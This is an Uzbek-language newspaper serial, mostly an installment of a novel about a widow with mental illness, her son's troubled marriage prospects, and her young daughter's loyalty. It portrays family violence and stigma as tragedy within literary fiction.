Газета сериали

Специально для наших постоянных и преданных читателей, мы создали рубрику, в которой вы найдете эксклюзивные публикации известнейших авторов Узбекистана и Центральной Азии.

    Ҳаёт қайиғи

    Бу асарни ёзишни ўн икки йил аввал бошлаган эдим. Баён қилинажак фикрлар  жиддий жарроҳлик амалиётидан кейин, ўлим уйқусидан уйғонган пайтимда хаёлимда кезган эди. Унга қадар, эрталаб ҳамшира кириб эм игнасида билак томиримга дори юборди-да, “тайёр бўлиб туринг, уч дақиқадан кейин олиб кетамиз”, деди.

    О Р И Я Т (давоми)

    Шамсиддин аввалига жим турди, сўнг ўшқириб берди. –Менга томоша кўрсатмай овозингни ўчир. Одамларга нима дейсан? Ҳаммасига ўзинг айбдорсан, сен бўлмаганингда қишлоқнинг олди қизига уйланардим, касрингга қолдим, энди тилингни тийиб юр. Маъқул холанинг жазаваси тутди. –Эй худо, у яна мени айблаяпти, айбсиз эканимга қандай ишонтирай уни?  Нима қилай? Ҳали мен унга дорихона қуриб бераман, деб юрибман. Садқайи дорихона кет. Садқайи она кет. Худойим, бўлмаса жонимни ол, ўлиб кетай, изларимга зор бўлсин Шамсиддин, сўзларимга зор бўлсин Шамсиддин... Меҳри,  акам онамни уриб юбормасин, деган хавотирда стартдаги спортчидай югуришга шай турди, лекин Шамсиддин урмади,   эшикни қаттиқ ёпиб чиқиб кетди.   ХХХ   Ҳамма нарсанинг ўз вақти-соати бор, инсон оёғини қўлига олиб югургани билан ўша вақт келмаса ҳеч нарсага эриша олмайди. Ниҳоят  Шамсиддиннинг бошини иккита қиладиган кун яқинлашди, шекилли, у билан  ишлайдиган аёл ўртага тушиб, қўшни тумандан қиз топди. Икки ёш бир-бирига маъқул бўлгач, унаштириш маросими ўтиб,  тўйга тайёргарлик бошланди.  Уйнинг битта хонасини келинга ажратиб, безатишди, ғунажинни сотган пулларигаи сеп олиб, қолганини тўйга атаб қўйишди. Севинганидан ўзини қўярга жой тополмаган  Маъқул хола кўрпа, кўрпачаларни қавишга тушди. Шамсиддиннинг ҳам баҳри-дили очилиб, қовоғини ўн қарич қилиб юрмайдиган бўлди. Бу мотамсаро ҳовлига кириб келаётган тўй  нашидасидан масрур эди оиланинг ҳар бир аъзоси.  Бироқ тўйга саноқли кунлар қолганида икки нотаниш аёл келиннинг сепларини қайтариб  келган куни  ҳовли яна мотамхонага айланди. –Опам билан поччам фикрларидан қайтдилар,–сўз бошлади  аёллардан бири. – Қизларини ҳали узатмас эканлар, бизни кечиринглар. Маъқул хола бўларича бўлди, нотаниш аёлларга бирор нарса дейишга ҳам улгуролмади, кетиб қолишди. Аксига олиб Шамсиддин  ҳам уйда,  ҳамма гапни эшитиб турарди. –Жиннилигинг  ўша жойгача етиб борибди-да,– онасига ғазаб билан қаради у. –Сен тирик экансан, фақат мени эмас, мана буларнинг ҳам бахтини боғлайсан, куни қоронғи бўлади. Ё сени ўлдираман, ё ўзим ўламан. У онасига яқинлашди. Маъқул хола ўғли уришидан қўрқиб, икки қўли билан юзини бекитиб олди. Шамсиддин онасининг ёқасидан ушлаб кўтарди ва силкитиб-силкитиб ҳолдан тойдирди-да, девор томон итариб юборди. Аёл мувозанатини йўқотиб йиқилди. Кўзи қонга тўлган Шамсиддин энди уни қўлидан тортиб судрай бошлади.  Санам   дир-дир титраб, турган жойидан қимирлолмади. Меҳри  ўйлаб ҳам ўтирмай ўзини  акасига  отди ва унинг кўйлагидан, шимидан тортиб, онасидан узоқлаштирмоқчи бўлди. Шамсиддин энди онасини қўйиб, Меҳрини савалай кетди. Меҳри бир амаллаб  акасидан қочиб уйга кирди ва эшикни  ичкаридан бекитиб, деразадан мўралади. Бу орада Маъқул хола кўчага қочишга улгурган, Шамсиддин эса сўрининг бир четида ғазабини босолмай ўтирарди. Ўғлининг қўлидан халос бўлган Маъқул хола оёғига ковуш кийишга улгурмай, боз устига рўмоли дарвозахонада тушиб қолган ҳолда кўчадан кетаверди. Уни таниганлар: “Шўрликнинг дарди яна қўзғабди-да”, деса,  танимаганлар: “Ким экан бу бечора, ақлдан озганга ўхшайди”, деб қўярди. Аслида Маъқул холанинг эс-ҳуши жойида бўлсаям ўзининг оёқяланг, бошяланг эканини унутган, алам ва хўрлик, изтироб ва тушкунлик етаклаб кетаётган эди уни. Шу алфозда тўғри қайнисиникига кириб борди. Кўзлари кўкарган, сочлари тўзғиган янгасини кўрган Қулмат ачиниб кетди, бўлган воқеани эшитгач, жаҳли чиқди. –Аҳмоқ бола, шунақаям қиладими? Хафа бўлманг, янга, кўзига кўрсатиб қўяман у падарлаънатини. –Унда айб йўқ, –зорланди Маъқул хола. –Ҳамма мени жинни деб ўйлагани учун болам бечора қон бўлди, мени ҳам қон қилди.  Акангизнинг хотираси ҳаққи-ҳурмати, жон ука, келинни уйингизга туширинг. Ҳеч бўлмаса бир ой шу ерда яшасин, кейин бизникига боради, тўй ўтгач, ота-онаси ҳукмини юритолмайди. Қудалар сизни яхши танийди, совчиликка ҳам ўзингиз боргансиз, Шамсиддин ўғлингиздай гап, бир иложини қилинг, жон ука. Момохол уйдан  рўмол олиб чиқиб, овсинига тутди. Маъқул хола сочларини йиғиштириб, рўмолни боғлаб, оёғига овсини берган калишни кийди. –Ичкарига киринг, чой  ичамиз,–деди Момохол. –Йўқ, йўқ,– деди у. –Ҳеч нарса емайман, томоғимдан овқат ўтмайди. Шамсиддинимнинг қийналганини кўриб чидолмаяпман. Бошқа ёрдам сўрайдиган кишим йўқлигидан остоналарингга бош уриб келдим. Боламни қутқазинглар, болам ёлғиз, болам бечора... Маъқул хола из-из йиғлар, унинг бу ҳолатини кўрган ҳар қандай кишининг юрак-бағри эзиларди. –Майли, янга, –деди Қулмат. – Келинни бизнинг уйга туширамиз. Овсинингиз иккимиз болалар билан ошхонани жой қилиб оламиз, кейин бир гап бўлар. Эртага эрталаб  қудаларникига бориб,  кўндириб, тўй кунини белгилаб келаман. –Умрингиздан барака топинг, дунё турганича туринг. Болам ёлғиз, болам бечора, ёрдам беринглар, ёрдам... Маъқул хола ортига қайтди, йўлма-йўл унинг жағи ўчмади: –Болам ёлғиз, болам бечора, ёрдам беринглар, ёрдам... У  Шамсиддинга амакисининг сўзларини етказди. Ўғли ҳеч нарса демади, афтидан унинг кайфиятини билиб бўлмас, иш битди, деб ўйлаганидан кейин ҳам муаммолар бўртиб чиқаётганидан тушкунликка тушганди. Эртаси куни Қулмат амакиси қудаларникига бориб, тўйни кейинги ҳафта чоршанба кунига белгилаб келганидан кейингина  бир оз чеҳраси очилди. Орадан уч кун ўтиб, Шамсиддин онаси тўйга атаб боқаётган жувонани амакисиникига олиб кетди. Сўнг бирин-кетин келинга аталган буюмларни ташиди. Безатилган хона шип-шийдам бўлиб, қачондан бўён янга қиламиз, деб учиб-қувониб юрган болалар тумтайиб қолишди. Маъқул холанинг ичидан зил ўтса ҳам сездирмади, у қайнисининг уйига бўлса-да, келин тушираётганидан хурсанд, келин қаерда яшамасин, меники, ўғлимнинг жуфти ҳалоли, деган фикр билан ўзини овутаётган эди.  Қизларига, ўзига кўйлак тиктириш мақсадида сандиғидан мато олиб, Малика момонинг келини Ибодатга элтиб берди. Тўй баҳона Ғайбиддин билан Хайрулла ҳам янги кўйлакли бўлишди. Болалари билан бирга Маъқул хола тўй бўладиган кунни – чоршанбани орзиқиб кута бошлади.   ХХХ               Тақдир ҳар кимнинг ўз  қўлида, дейдилар-у, баъзан оддийгина тасодиф ҳам тақдирни яратиб қўйганини сезмай қолади киши. Уйланиш ҳақидаги режалари бузилиб кетавергач, ҳардам хаёл бўлиб қолган Шамсиддин баъзан кўзларини бир нуқтага тикканича хаёлга берилади.   Ҳамкасб хотин-қизлар ҳазил қилишса, ўлганининг кунидан зўрға тиржаяди, ўзининг оғир табиатли экани етмагандай юрагидаги кучли ғалаёнлар ҳам йигитнинг очилиб юришига йўл қўймайди. Одатдаги кунлардан бирида дорихонага кириб келган оқ-сариқ юзли, ўрта бўйли қиз Шамсиддиннинг эътиборини тортди.  У қўлига қизлар учун урф бўлган қора чарм сумкача кўтариб, пушти кофта билан қора юбка кийиб олганди. Қизнинг юзларини билинар-билинмас сепкил босган, ўнг чаккасида тангадай нори бор эди. “Яхшигина қиз экан-у, нори бир оз ҳуснини бузиб тураркан”, хаёлидан  ўтказди Шамсиддин. Қиз  унга эътибор ҳам бермай, тўғри  нариги бўлимга ўтиб, бир маҳал  Шаҳзода исмли хушчақчақ жувон билан чиқиб келди. –Эртага соат ўнларда кел, кутаман, – деди қизни кузатиб қўяркан у. Қайтишда  беихтиёр кўзи ўзига тикилиб турган Шамсиддинга тушиб ҳазиллашди: –Жияним, амакимнинг қизи, ҳали турмушга чиққани йўқ, хоҳласангиз ўртага тушишим мумкин. Шамсиддин кулиб қўйди. Ичида: “Онамнинг жиннилигини эшитсанг ўртага тушиш у ёқда турсин, жиянингни етти чақирим наридан қочирасан”, деб қўйди. Бироқ негадир шу  қизга хаёли кетаверди, мижозлари билан муомала қилганда ҳам, тушликка чиққанда ҳам, уйга қайтаётганда ҳам. Ўйлагани сайин қиз чиройли, жозибали бўлиб туюлаверди. “Бир қарашда юзидаги нори кўзга ташлангани билан барибир чиройли, кўнгли тоза, беғубор қизга ўхшайди”, деди ўзига ўзи. Шамсиддининг қиз ҳақидаги илк тасаввури ана шундай бўлди ва тонг отишини, соат ўн бўлишини орзиқиб кута бошлади. “Бугун яхшироқ разм соламан, яқинроқдан кўраман”, деб қўйди ўзича. Аммо нима учундир эртаси куни Шаҳзода ишга келавермади, Шамсиддин бу ҳақда унинг ёнидаги шеригидан сўрамоқчи эди, кўнглидаги кечинмалари ошкор бўлаётгандай  индамади, хаёлидан, қиз ҳам келмаса-я, деган фикр ўтиб безовталанди.  Бу орада дорихонага бири келиб, бири кетаётган мижозларга керакли дориларни топиб берди, бироқ хаёли барибир паришон, тез-тез соатига қараб қўярди. Ва ниҳоят соат ўндан ўтган ҳам эдики, эшик очилиб ҳалиги қиз кўринди, унга кўзи тушиши билан Шамсиддинни ҳаяжон босди, ўзини қандай тутишни билмай қолди. Қиз Шаҳзоданинг шериклари билан саломлашди-да, аммасини сўради. Шамсиддин қулоғини динг қилиб уларнинг суҳбатини эшитиб турди. –Кичкина ўғилчаларининг тоби қочибди, духтирга кўрсатиб, кечикиброқ бораман, деб қўнғироқ қилдилар. Бирпас кутиб туринг, келиб қолсалар керак. Қизнинг иши зарур, шекилли, бетоқат ҳолда у ёқдан бу ёққа юра бошлади. Пайтдан фойдаланган Шамсиддин ўзи ўтирган стулни қизнинг ёнига олиб бориб қўйди. –Ўтиринг. Қиз унга бир қаради-да, раҳмат, деди. Шамсиддин жойига ўтиб, сездирмасдан уни кузатишга тушди: бугун у эгнида митти гулчали оқ кўйлак кийибди, кийими ўзига ярашган, ҳалиги нори ҳам кўпам сезилмайди, сочи билан хиёл яширибди., кўзлари... мовий экан, қарашлари жиддий, лаблари қип-қизил, худди бўялгандай, лекин табиийлиги  сезилиб турибди. Қиз стулда бир оз ўтиргач, ўрнидан туриб, деразадан ташқарига қаради.  Шамсиддин унга бирор нарса дегиси келди-ю, нима дейишни билмади, қизни кузатишдан бошқасига ярамади, Ниҳоят Шаҳзода кириб келди, жиянини кўриб билан ундан узр сўрай бошлади. –Ўлай сенга, Норхол, кечир. Сарваримнинг тоби қочиб қолди, духтирга кўрсатиб,  аямга ташлаб келяпман. Боғчага ҳам олиб бормадим. Энди бирпас ўтириб турасан, тушга яқин чиқамиз. –Майли, амма, сиз нима десангиз шу. Шамсиддин қизнинг ҳар бир ҳаракатидан, ҳар бир сўзидан  гўзаллик қидирди ва қидирган сайин топгандай бўлаверди. Қиз аммаси билан чиқиб кетгунга қадар диққатини ундан узмади ва энди бу ҳақда Шаҳзода опага қандай билдирсам экан, деб ўйга толди. Унинг, ўртага тушаман, деб ҳазил аралаш айтган сўзлари Шамсиддинга далда бўлди, ўртоқларимнинг кўплари  уйланишди, юрсам юравераман, ётиб қолгунча отиб қолишим керак, деган фикрда  қулай пайт пойлади. Эртаси кун бўйи  Шаҳзодани холи учратолмади, пешинда бир гала  аёллар тушликка чиқишди, тушдан кейин у, боламнинг тоби йўқ, деб кетиб қолибди, хуллас, иши битмай яна бир тунни ўтказди. Тонг отгач, эҳтимол Шаҳзода опа вақтли келар, деган хаёлда каллайи саҳарлаб ишга отланди, аммо Шаҳзода одатдагидай роппа роса саккизда ишга келди. Соат ўнлар чамаси шериги  нимадир юмуш билан чиқиб кетди, пайтдан фойдаланган Шамсиддин Шаҳзоданинг ёнига борди. –Опа, мумкинми сиз билан гаплашсам? –Ҳа, Шамсиддин, тинчликми? –Жиянингизга уйлансам,  ўртага тушасизми? – гапнинг пўскалласини айтди-қўйди у. Индамай юрадиган боланинг дабдурустдан бунақа дейишини кутмаган Шаҳзода анграйиб қолди, ичида: “Кесакдан ҳам олов чиқар экан-ку”, деган бўлса ажабмас. –Сен бола ҳазилни тушунмайсанми? – деди ниҳоят. –Тушунаман. –Унда бу қанақа гап? –Сўзларим жиддий, Шаҳзода опа. –Жияним сенга ёқдими? –Ҳа. –Ўртага тушсам уялтирмайсанми? –Уялтирмайман. –Унда аввал амакимнинг олдидан ўтай, кейин қиз билан гаплашаман, розилик берса, тўй бўлди деявер. –Опа, олдиндан бир гапни айтиб қўяй, менинг онам касал. У... Шамсиддин у ёғини айтмади, айтолмади, титраб кетди, айтсам яна ҳамма нарса тамом бўлади, деб ўйлади ва жимиди, хайриятки, Шаҳзода гапни ковлаштирмади. Шамсиддинга ҳар бир куннинг ўтиши йилдай туюлди. Ҳар эрта ишга келиши билан Шаҳзоданинг оғзини пойлайди, айтмадимикин, деб ўйлайди, аммо Шаҳзоданинг парвойи фалак, одатдагидай ишини қилиб юраверди. Тўртинчи куни  Шамсиддин чидаб туролмади, сўради: –Шаҳзода опа, айтмадингизми? –Уйланиш  осонми, куёв бола, сабрли бўладилар, – ҳазиллашиб гапирди Шаҳзода ва сўнг жиддий тортди: – Тўғрисини айтсам, амакимникига боришга вақтим бўлгани йўқ, кўряпсан-ку, эрта келиб, кеч кетаман. Амакимнинг уйи бир қадам узоқ, энди якшанба кунини  мўлжаллаб турибман, бориб, албатта, айтаман. Қўрқма, мен сен томондаман, икки йилдан бўён бирга ишлаймиз, сени биламан-ку. Шаҳзоданинг амакиси Қўчқор қассоб беш вақт намозини канда қилмайдиган бир қўли хайрда бўлган художўй киши эди.  Жиянининг сўзларини эшитгач, ёшлар бир-бирини кўрсин, рози бўлишса, биз нима дердик, деб қўйди. Шундан сўнг Шаҳзода Норхол билан гаплашди. –Эшикдан киришинг билан тўғридаги бўлимда ишлайдиган йигит, –деди Шаҳзода. –Борганингда кўргандирсан. –Билмадим, сизни кутаётганимда бир йигит стул қўйиб берганди, ўшамикин? –Ўша, у ерда яна бир ёши каттароқ киши ишлайди. Ана кўрдингми, қанчалар эътиборли, маданиятли, бир учрашиб кўр. –Билмасам... Шаҳзодага шу керак эди, душанба куни  тушдан кейин икки ёшни учраштирадиган бўлди. Шамсиддин хушхабарни эшитиб қувониб кетди, тушда уйига бориб бисотидаги битта-ю битта қора костюм-шимини, ҳаво ранг кўйлагини кийиб, сочларини орқага тараб, ўзига оро берди. Бир хаёли иссиқда костюм кийиб олибди, деб ўйлармикин, деган хаёлда ечмоқчи ҳам бўлди, аммо бу кийим ўзига ярашгани, салобатли кўрсатгани учун ечгиси келмади. Улар Шамсиддин ишдан чиққач, истироҳат боғида учрашишди. Йигит қизни музқаймоққа таклиф қилди, ўтирганларидан сўнг  аввалига оғзига талқон солгандай гапни нимадан бошлашни билмай  жим турди, қиз-ку, ўз-ўзидан  биринчи бўлиб гапирмаслигини, ўртадаги  сукунатни ўзи бузиши кераклигини билса-да, хаёлига жўяли гап келмади, ниҳоят таваккалига ўтди. –Уйда ўтириб зерикдингизми, ишга кирмоқчи экансиз? Шаҳзоданинг, жияним боғчага ишга жойлаштириб қўйинг, деб келибди, деган гапи эсига тушиб саволни беришга берди-ю, уялиб кетди. “Қиз болага ҳам шунақа бемаъни савол бераманми, нега олдинроқ  бу ҳақда ўйлаб қўймаган эканман?”, деб ўз-ўзини койиди, бироқ қиз саволни тўғри қабул қилди. –Уйда зерикишга вақт йўқку-я, барибир ишлашни хоҳлайман. Шунинг учун аммамга, танишларингиз кўп, бирор иш топиб беринг, дегандим. Икки йил институтга ўқишга бордим-у, омадим чопмади, ўқитувчиларимни кўрсам ҳалиям уяламан. –Қайси институтга  бордингиз? –Икки йил ҳам пединститутга бордим. Биринчи йил танловдан қайтдим, кейинги йил охирги имтиҳондан ўтолмадим. Норхол Шамсиддин ўйлаганидай кўнгли очиқ, самимий қиз экан, юракдан гапирди. –Мен эса институтда ўқимаганим учун армон қиламан. –Кира олмадингизми? –Йўқ, боришга қўрқдим. Оилада катта фарзанд эдим. Отам қазо қилганлар, онам... Онам ... Ҳалиги касал эдилар... Ҳозир ҳам касаллар... –Тузалиб кетсинлар. Бир гал онам касал бўлганларида ундан кўра мен касал бўлай, деб худодан сўраганман. Сизни тушуниб турибман. “Тушунганинг учун раҳмат”, деди ичида Шамсиддин. Шундан кейин улар яна икки-уч марта учрашишди, гап-гапга қовушди, кўнгил кўнгилга йўл топди. “Ёшлар бир-бирини кўрсин, рози бўлишса, биз нима дердик”, деган Қўчқор қассоб ҳам ҳеч кимга сездирмай  Шамсиддинни кузатди, “Оғир, вазмин, ақлли йигитга ўхшайди”, деган хулосага келган эди у. Шу тариқа тўй куни белгиланди, аммо кутилмаганда қуда аёлнинг жиннилиги маълум бўлди. Қўчқор қассоб иккиланиб қолди, кимдир: “Қизингнинг бахтини қайтарма”, деса,  кимдир: “Онаси жинни бўлса, кўра-била туриб ўтга ташлама”, деди. Хотинининг: “Норхол жинни аёл билан қандай яшайди?”, деган сўзларидан сўнг ўртага  тушган Шаҳзодани ноқулай аҳволга солиб тўйни қайтариб юборди. Буни эшитган Норхол тумтайиб олди, қисқа вақт ичида Шамсиддин унинг кўнглидан жой олганди, аслида у онасининг касал эканини яширгани йўқ, айтди, фақат Норхол, қанақа касал, деб сўрамади. Шамсиддин бу ҳақда Шаҳзодага ҳам айтган экан, онаси касал бўлса унинг айби нима? Норхол отасига ҳеч нарса демади, бироқ онасига  норозилигини билдирди: “Энди менга турмушга чиқиш ҳақида гапирманглар”. Ана шундай кунларнинг бирида уйларига Қулмат кириб келди. Қизнинг тақдири Шамсиддинга қўшилган экан, гап-сўзлар ортда қолиб,  тўй қилишга келишиб олинди. ХХХ          Айни ёз ойлари келин тушираман, деб юрган Маъқул холанинг режалари бузилиб, атрофга олтин сочларини ёзиб куз кириб келган, ҳовлиларида олмалардан тортиб шафтолиларгача ғарқ пишган, бир ҳисобдан тўйнинг  кузда бўлаётгани ҳам яхши, дастурхонни мева-чева, қовун-тарвуз билан тўлдириб ташлаш мумкин, фақат ёмғир ёғиб бесаранжом қилмаса, бошқа муаммо йўқ эди. Тўй қайнисининг уйида бўлса-да, қўшниларни айтмаса уят бўлади, деб ўйлаган Маъқул хола бирма-бир атрофдаги хонадонларга кириб юрганди, қишлоқ бригадири Тоштемирга дуч келди.  У айиқдай семириб, бағбақалари осилиб қолибди, семизлигидан қисиқ кўзи янаям кичик кўринди Маъқул холага. –Шамсиддин уйланяпти, деб эшитдим, муборак бўлсин, янга –деди у. –Шукур, етказганига шукур. Маъқул хола ўтиб кетаётганди, Тоштемир бригадир яна гапга тутди. –Тўйнинг помидор ва бодиринги биздан,  Шамсиддинга айтинг, олиб кетсин. Маъқул хола унга “ялт” этиб қаради. Бир пайтлар қиш қаттиқ келиб, молига озгина озуқа сўраганида  ҳайдагандан баттар қилиб юборгани кечагидай эсида. “Бундан кейин  молим-ку мол, ўзим очдан ўлсам ҳам сендан ҳеч нарса сўрамайман”, деб онт ичганди ўшанда.  Бугун  ўша Тоштемир  бригадир ҳиммат кўрсатмоқчи. Маъқул хола:  “Тўйдингми, сендан ҳам ортарканми?”, демоқчи бўлди-ю, яна фикридан қайтди. –Қайнимнинг уйида помидор, бодиринг тиқилиб ётибди, –деди у. – Ҳимматингиз учун раҳмат. Афтидан Тоштемир бригадир аёлдан рад жавобини кутмаган кўринади, юзи ўзгариб кетди. –Берганнинг бетига қарама, дейдилар, олавермайсизми? Ўзингиз кал бўлсангиз ҳам кўнглингиз жа-а  нозик-да. Энди Маъқул хола ўзини тутиб туролмади. –Помидор билан бодирингинг бошингдан  ордона қолсин. Сен менга садақа бермоқчи бўляпсанми? Садақани  мен сенга бераман. Ҳали болаларимнинг оёғига тиз чўкасан, ёрдам сўраб келасан. Кўрмаяпсанми, Шамсиддинимга икки қаватли  дорихона қураяпман. Чириб ётган помидоримга зор деб ўйладингми? Тахтапуштингга боғлаб қўй... –Аҳмоқ бўлмасам сен эси пастга  гапираманми? – деди Тоштемир бригадир атрофида йиғилган одамлардан уялиб. – Ношукур. У орқа-олдига қарамай қочиб қолди. Маьқул хола, бопладим, дегандай қаҳ-қаҳ отиб кулди. –Тўйибди, – деди у одамларга қараб. – Тоштемир бригадир тўйибди, қорнининг шишиб кетганига қаранг, ёрилай дейди. Бир пайтлар ялиниб борганимда сомон бермай ҳайдаб  юборганди, энди менга помидор билан бодиринг берармиш.  Помидорингсиз тўйим ўтмай қоладими? Сени есин помидор ва бодирингинг. Тоштемир бригадирдан аламзадалар бор эканми, бир зумда унинг  ғийбати бошланди. –Бопладингиз, янга, – деди Ўрал исмли киши. – Бригадирман, деб бурни осмонга кўтарилиб кетганди. –Завод помидорни олмаяпти, пишгани далада чириб кетяпти, шунга сахийлиги  тутган-да, – истеҳзо билан гапирди Қодир ота. –У сиқса сув чиқмайдиган, қишда қор сўраса бермайдиганлар хилидан, – деди яна кимдир. –Исми жисмига мос, тошдан ҳам, темирдан ҳам қаттиқ. –Қишлоқда бошқа киши қуриб кетгандай эсимни таниганимдан бери шу бригадир. Одамлар Тоштемир бригадирни  ғийбат қила-қила тарқалишди Сешанба куни Ғайбиддин билан Хайрулла уйларидаги мевалардан териб, узумларни узиб,  яшикларга жойлаб қўйишди, Шамсиддин ишхонасидаги машина билан уларни амакисиникига олиб борди, сўнг биргаликда кечки овқатга ўтиришди. Тамадди қилиб бўлишган ҳам эдики, Малика момонинг келини Ибодат кириб келди. – Янга, кўйлакларингизни тикдим, – деди у Маъқул холага қараб. – Ўзим олиб кела қолдим, кийиб кўринглар-чи. Она ва қизлар  кўйлакларини ажратиб олишди. – Бодомга тикдирмадингиз, хафа бўлмайдиларми? – сўради Ибодат. –Опамнинг кўйлаклари кўп, –онасининг ўрнидан Санам жавоб берди. – Яқинда дўкондан тайёрини олдилар. Улар кўйлакларини кийиб кўришди. –Жуда ярашди, она, очилиб кетдингиз. Энди куёвнинг онасига – тўй эгасига  ўхшадингиз. Санамнинг сўзларидан Маъқул хола ёш боладай қувониб, қиқир-қиқир кулди. Санам билан Меҳри ҳам  ўзларини ойнага солишди. –Чиройли тикибсиз, раҳмат янга, – деди Санам. Маъқул хола рўмолчасини титкилаб, Ибодатга пул бермоқчи эди,  олмади. – Бу мендан сизларга тўёна, яхши кунларда кийинглар. Ўзида йўқ хурсанд Маъқул хола Ибодатни қучоқлаб олиб, биздан қайтмаса, худодан қайтсин, деб дуо қилди. Ҳамма гапни эшитиб ўтирган Шамсиддин Ибодат кетиши билан онасига ўдағайлади: –Тўйга боришни хаёлингдан чиқар, орқанг тутиб, тўйимни  бузсанг, ким деган одам бўламан? Неча ойдан бери келин орзусида юрган аёл сувга тушган нондай бўшашди, бир Шамсиддинга қаради, бир қизларига. Меҳри чидаб туролмади. –Борадилар,–деди акасига. – Онамни хафа қилсангиз амакимга айтаман, ўзлари олиб борадилар, тўйга  амаким хўжайин. –Бор, айт!  Онам тўйга борса, мен бормайман. Онам тўйга борса фикрим бўлинади, хаёлим чалғийди, жиннилиги тутса нима қиламан, деб ўйлайман, ўзига ўзи нималарни гапиряпти, деб ўйлайман. Шармандайи шармисор бўлмасмикинман, деб ўйлайман.  Одамлардан уяламан, тушуняпсанми, уяламан. Онамнинг тўйда бош бўлишини истамайди, деб ўйлайсанми, истайман, аммо онам унақа аёл эмас, онам ишни бузиб қўяди. Онам... Онам... Эй, тилимни қичитма... Хонага чуқур сукунат чўмди, боядан бери бидирлаётган Меҳри ҳам жимиди, Маъқул хола кўзидан оқаётган ёшларни қўли билан сидириб ташларкан: –Майли, шуни истасанг, уйда қоламан, ким борса бораверсин, –деди. Меҳри маъюс тортди, у тўйни орзиқиб кутаётган бўлсаям, онасини ёлғиз ташлаб кетолмасди. –Унда мен  ҳам бормайман,– деди секингина. Шамсиддин синглисига еб қўйгудай тикилди. –Сенсиз ҳам тўй ўтади, бормасанг борма. Бу хонадонда Шамсиддиннинг гапи гап, сўзи сўз, ортиқча баҳсга ҳожат йўқ эди.                                                                                        ХХХ   Маъқул хола келин туширишга мўлжаллаган уйнинг деворлари оқланиб, эшик ва деразалари бўялгани билан эскилиги билиниб турар, айниқса, Шамсиддин анжомларини олиб кетгач, шип шийдам ва файзсиз бўлиб қолганди.  Намиқиб, шўрахо очган деворларни Шамсиддин суваб чиқса-да, чумчуқ сўйса ҳам қассоб сўйсин, деганлари рост экан, дўппайиб чиққан сувоқларни яшириш учун Маъқул хола деворнинг тўрт томонига гулдор сатин  қоқиб чиқди, тўй Қулматникида  ўтиши аниқ бўлгач, Шамсиддин сатинни ҳам юлиб кетди, деворнинг ҳар ер, ҳар ерида қўпорилган михларнинг изи билиниб қолди. Маъқул хола йиғлашдан ўзини тийиб,  уйнинг  бир бурчагида ўтириб олди-да, бошини икки тиззаси устига қўйиб хаёлга чўмди. У ўзини нохуш сезаётганди, назарида пешонаси ўт олаётгандай ва ундан таралаётган ҳарорат бутун танасига тарқалиб кўйдираётгандай эди.  Аёлнинг юраги безовта уриб, бошини кўтарди, икки кафтини устма уст қўйиб манглайини ушлади ва энди  вужудига ўрмалаётган оташни ўчирмоқчи бўлди, лекин эплолмади, жаҳли чиқиб кетди ва пешонасини деворга ура бошлади.  Онасининг ортидан хавотир билан келган Меҳри уни ушлаб олмаганида бу талваса нима билан тугашини ҳеч ким билмасди. –Қўй, мени, пешонамнинг олови ҳамма ёғимни кўйдиряпти, ичим ёниб кетяпти. Бу шўр пешонани уриб ўлдираман. Қўй, индама. Маъқул хола кучли аёл эди, айниқса, шу топда – кўзлари қинидан чиққудай катта-катта очилиб, чакка томирлари бўртиб, ҳатто лабларигача пир-пир учиб, важоҳат билан турган бир пайтда уни ушлаб туриш қийин бўлсаям  ёшгина Меҳри уддасидан чиқди, онаси қанчалик ўзини ҳар ёнга урмасин, эпчиллик билан олдига ўтиб, деворга бошини уришига йўл қўймади. Ниҳоят Маъқул хола чарчади, оёқларини узатиб, бошини хам қилиб ўтириб олди. У бир муддат шу алфозда тургач, Меҳрига қаради. –Кет олдимдан, кет! –Кетмайман! –Кет! Тўйга бор! Кўзимга кўринма! –Йўқ, бормайман! –Мана сенга бормасанг, мана. Маъқул хола Меҳрининг юзига тарсаки туширди, қиз қочмади, қаршилик кўрсатмади, “ураверинг”,  дегандай юзини тутиб тураверди. Қизни эгиб бўлмасди, аёлнинг шашти синди ва қизини қучоқлаб олди. –Нега бормайсан, ахир, Мен бор десам ҳам бормайсан, тўйни қачондан бери кутаётганингни билмайманми?  Кун санаётганингни билмайманми? Энди нега бормайман дейсан? Мен, жинни онанг ўлиб кетмайдими, нима ишинг бор, нега ҳоли-жонимга қўймайсан, нега канадай ёпишиб олгансан? Маъқул хола қизини қучоғидан бўшатмай  йиғлаб гапираверди, Меҳри йиғлаб эшитаверди. У шу тарзда  ғубордан чиқди, кўнглини бўшатди, энди анча босиқлик билан гапирди. –Тўйга бор, менга келин ҳақида гапириб берасан. –Буни Санам опамдан билиб оламиз. –Сен яхшилаб гапириб берардинг-да. –Опам мендан ҳам яхши гапириб берадилар, тайинлайман. Ўртага сукунат оралади,  бирпас ўтиб, Маъқул хола ўз-ўзига савол бергандай пичирлади: –Келин қанақа бўлса? Ақллимикин? Устимдан кулмасмикин? –Нега кулади? Мен кулгани қўяманми? – деди Меҳри. –Сени қўлингдан нима келарди,  ҳали кичкинасан-ку. –Кичкина деманг мени, кўтариб ураман... Меҳри мақолнинг давомини айтмади-да, мийиғида кулиб қўйди,  Маъқул хола ҳам жилмайди. Аслида Маъқул хола тўғрисини айтди: Меҳри ҳали кичкина,  эндигина иккинчи синфни тугатяпти. Унга алам қилгани ҳам кичкиналиги, акасига кучи етмагани эди. У ёшига нисбатан журъатли, қатъиятли бўлса-да онасини ҳимоя қилиш учун фақат журъатнинг ўзи камлик қилишини англаб етган, шунга қарамай онаси азоб чекса, томошабин бўлиб ўтиролмасди. Бир гал бу ҳақда Санамга ҳам айтганди. “Опа, нега акам онамни калтакласа, Бодом опам жеркиб ташласа индамайсиз, онамнинг тарафини олмайсиз?” “Қизиқмисан, улар мендан катта, нима дейман?  Шамсиддин акамга кучим етмайди. Мана, сен, тарафкашлик қилганинг билан қўлингдан нима иш келяпти? Калтак еганинг қолади, холос”. Санам ҳақ гапни айтган бўлса-да, Меҳри унинг сўзидан қониқмади. “Калтак есам ҳам майли, барибир ҳимоя қилавераман,” Ҳозир онасининг, келин менинг устимдан кулмасмикин, деган сўзлари уни баттар эзди. “Мен кулгани қўяманми?”, дейиши билан танасида  ғайритабиий бир кучни туйди ва ўзига ўзи “Энди онамни хўрлатиб қўймайман”, деб ваъда берди. –Қўлимдан қўп иш келади, ҳали кўрасиз,  –Меҳри шунчалик ишонч билан гапирдики, онасининг кайфияти кўтарилди. –Ҳеч кимга ишонмасам ҳам сенга ишонаман. Сен ҳали ҳамманинг ҳаваси келадидиган катта одам бўласан. Ўлиб кетган тақдиримда  осмондан туриб сени кузатаман, қўллайман. 